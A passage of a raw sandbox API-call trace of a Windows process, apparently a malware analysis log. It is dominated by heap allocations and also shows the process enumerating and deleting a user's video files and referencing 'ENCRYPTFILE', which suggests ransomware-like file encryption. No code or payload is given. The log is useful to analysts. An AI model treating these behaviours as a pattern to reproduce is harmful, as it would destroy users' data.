Flags=0x0, Size=0x4) returned 0x43e2850 [0106.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x43ec308 [0106.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a80e8 [0106.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a8190 [0106.528] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\kdyPGegxQAqdUuFtfW.mkv", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd7fbae0, ftCreationTime.dwHighDateTime=0x1d5e2f4, ftLastAccessTime.dwLowDateTime=0x83865760, ftLastAccessTime.dwHighDateTime=0x1d5e9f0, ftLastWriteTime.dwLowDateTime=0x83865760, ftLastWriteTime.dwHighDateTime=0x1d5e9f0, nFileSizeHigh=0x0, nFileSizeLow=0x7644, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="kdyPGegxQAqdUuFtfW.mkv", cAlternateFileName="KDYPGE~1.MKV")) returned 0x41ac700 [0106.528] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\kdyPGegxQAqdUuFtfW.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\kdypgegxqaqduuftfw.mkv")) returned 1 [0106.564] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd7fbae0, ftCreationTime.dwHighDateTime=0x1d5e2f4, ftLastAccessTime.dwLowDateTime=0x83865760, ftLastAccessTime.dwHighDateTime=0x1d5e9f0, ftLastWriteTime.dwLowDateTime=0x83865760, ftLastWriteTime.dwHighDateTime=0x1d5e9f0, nFileSizeHigh=0x0, nFileSizeLow=0x7644, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="kdyPGegxQAqdUuFtfW.mkv", cAlternateFileName="KDYPGE~1.MKV")) returned 0 [0106.564] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0106.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a8190 | out: hHeap=0x1780000) returned 1 [0106.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0106.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0106.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0106.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d3920 | out: hHeap=0x1780000) returned 1 [0106.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0106.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0106.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0106.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0106.565] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0106.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0106.565] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0106.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0106.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0106.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0106.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0106.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0106.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0106.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0106.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0106.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0106.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8260 | out: hHeap=0x1780000) returned 1 [0106.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0106.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0106.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0106.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0106.565] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0106.565] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0106.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0106.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0106.565] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0106.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0106.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0106.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0106.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27b0 [0106.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0106.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0106.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0106.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0106.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0106.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0106.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0106.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0106.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a80e8 [0106.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0106.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0106.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0106.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0106.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x180) returned 0x43e8260 [0106.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a80e8 | out: hHeap=0x1780000) returned 1 [0106.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0106.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0106.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0106.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0106.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0106.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0106.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0106.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0106.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0106.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0106.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0106.567] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0106.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0106.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0106.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0106.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0106.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0106.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0106.567] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0106.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0106.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0106.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0106.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0106.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0106.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0106.567] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\u5YsBEddaGYJI-.swf", lpFindFileData=0x144e718 | out: lpFindFileData=0x144e718*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe830870, ftCreationTime.dwHighDateTime=0x1d5e515, ftLastAccessTime.dwLowDateTime=0xd21e2dd0, ftLastAccessTime.dwHighDateTime=0x1d5e24d, ftLastWriteTime.dwLowDateTime=0xd21e2dd0, ftLastWriteTime.dwHighDateTime=0x1d5e24d, nFileSizeHigh=0x0, nFileSizeLow=0xd19f, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="u5YsBEddaGYJI-.swf", cAlternateFileName="U5YSBE~1.SWF")) returned 0x41ac700 [0106.567] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0106.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0106.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0106.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0106.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0106.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0106.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0106.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0106.568] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0106.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0106.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0106.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0106.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2740 [0106.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0106.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0106.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0106.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0106.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0106.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6a0 [0106.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0106.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0106.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0106.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0106.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0106.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0106.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0106.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0106.568] PeekMessageW (in: lpMsg=0x144e7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7b4) returned 0 [0106.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0106.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0106.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0106.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0106.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0106.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0106.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0106.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0106.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f88 [0106.569] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0106.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f88 | out: hHeap=0x1780000) returned 1 [0106.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0106.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0106.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2810 [0106.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0106.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0106.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0106.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0106.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0106.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2830 [0106.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0106.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0106.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0106.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28a0 [0106.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0106.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0106.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0106.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0106.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0106.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0106.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0106.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0106.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0106.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0106.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0106.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0106.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0106.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0106.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0106.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0106.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0106.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0106.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0106.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0106.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0106.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0106.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0106.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0106.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0106.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0106.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0106.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0106.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0106.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0106.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0106.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0106.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0106.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0106.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0106.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0106.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0106.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0106.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0106.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0106.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0106.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0106.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0106.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0106.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0106.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0106.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0106.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0106.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0106.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0106.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0106.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0106.571] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0106.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0106.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0106.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0106.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0106.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0106.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0106.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0106.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0106.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0106.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0106.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0106.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0106.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0106.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0106.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0106.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0106.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0106.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0106.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0106.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0106.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0106.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0106.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0106.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0106.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0106.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0106.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0106.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0106.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0106.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0106.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0106.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0106.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0106.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0106.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0106.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0106.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0106.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0106.572] HeapFree (in: 